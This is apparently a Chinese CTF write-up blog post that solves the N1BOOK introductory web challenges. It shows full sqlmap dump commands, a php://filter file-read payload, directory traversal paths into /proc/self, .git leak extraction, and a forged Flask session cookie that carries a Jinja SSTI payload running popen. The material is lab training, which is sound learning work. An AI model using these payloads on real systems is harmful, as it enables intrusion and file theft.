本文围绕Web入门CTF展开,介绍了常见的敏感文件搜集,如robots.txt、index.php~等文件获取flag;还涉及SQL注入、php伪协议、目录穿越与文件读取等漏洞利用方法,以及.git/泄漏问题的处理,最后讲解了利用脚本伪造cookie获取flag的技巧。
🍬 博主介绍
👨🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!
目录
前言
N1BOOK是Nu1L Team为方便读者打造的免费平台,读者可在上面享受书籍相关资源以及查阅勘误。
[第一章 web入门]常见的搜集
n1book{info_1s_v3ry_imp0rtant_hack}
这里提示敏感文件,这里使用御剑扫描不到目录
我这里使用dirsearch扫描网站目录:
┌──(root💀kali)-[~]
└─# dirsearch -u http://9fa5191e-fbba-4744-bff4-6f7a789577b3.node5.buuoj.cn:81/ -e*
-e* 参数,通常来说,它应该被替换为具体的文件扩展名,以便进行目标网站的有针对性扫描
robots.txt有flag1
flag1:n1book{info_1
index.php~有flag2
flag2:s_v3ry_im
.index.php.swp有flag3
flag3:p0rtant_hack}
拼接起来,flag是:n1book{info_1s_v3ry_imp0rtant_hack}
[第一章 web入门]SQL注入-1
n1book{union_select_is_so_cool}
这里我给大家搞好了闭合点,这个很简单,通过简单的判断就可以出来
sqlmap一把梭
感兴趣的小伙伴们可以尝试下利用手工联合注入,我这里直接利用sqlmap跑
sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" --dbs --batch ##跑库
sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" -D note --tables --batch ##跑表
sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" -D note -T fl4g --columns --batch ##跑列
sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" -D note -T fl4g -C 'fllllag' --dump --batch ##跑字段
[第一章 web入门]afr_1
http://cba81709-c243-48c4-b593-837760ff0de5.node5.buuoj.cn:81/
n1book{afr_1_solved}
php伪协议
直接利用php伪协议读取flag
?p=php://filter/convert.base64-encode/resource=flag
[第一章 web入门]afr_2
n1book{afr_2_solved}
http://e1003d70-123f-4635-8946-a3674a107066.node5.buuoj.cn:81/
右击查看网页源代码,发现有个/img目录
目录穿越,文件读取
[第一章 web入门]粗心的小李
n1book{git_looks_s0_easyfun}
1.下载GitHack
https://gitcode.com/lijiejie/githack/overview?utm_source=csdn_github_accelerator&isLogin=1
2..git/泄漏
python GitHack.py http://b376ab2f-a56f-49fe-8887-b0275fba45a1.node5.buuoj.cn:81/.git/
会生成一个index.html文件,打开就可以拿到flag了
[第一章 web入门]afr_3
n1book{afr_3_solved}
提交一个123上去
然后查看文章,发现url有传参
随便输入一个123,发现这里可能存在目录穿越或者文件包含漏洞
发现一个server.py文件
http://f70723e8-84fa-4861-b580-63657fa57ec5.node5.buuoj.cn:81/article?name=../../../../../proc/self/cmdline
在 Linux 系统中,/proc/self/cmdline 是一个特殊的文件,它包含了当前进程的命令行参数。通过读取这个文件,可以获取当前进程的命令行参数。
http://f70723e8-84fa-4861-b580-63657fa57ec5.node5.buuoj.cn:81/article?name=../../../../../proc/self/cwd/server.py
flag.py不允许访问
#!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'
在 Linux 中,/proc/self/cwd/ 是一个特殊的符号链接,它指向当前进程的当前工作目录。通过将 ../../../../../proc/self/cwd/key.py 附加到网站的地址中,你尝试获取当前工作目录下的 key.py 文件。
根据你提供的信息,得到的文件内容是 #!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'。这个文件内容表示是一个以 Python 编写的脚本,定义了一个名为 key 的变量,并给它赋了 'Drmhze6EPcv0fN_81Bj-nA' 这个字符串值。
加密脚本的获取方式:
git clone https://github.com/noraj/flask-session-cookie-manager
┌──(root💀kali)-[~/桌面/flask-session-cookie-manager]
└─# python3 flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"
.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.Zb9oCQ.Nn27TDkaahhdaRVZ6bm4ktrMcpI
当我们使用脚本得到session时,我们需要抓包,进行伪造cookie,得到flag
.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.Zb9oCQ.Nn27TDkaahhdaRVZ6bm4ktrMcpI
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
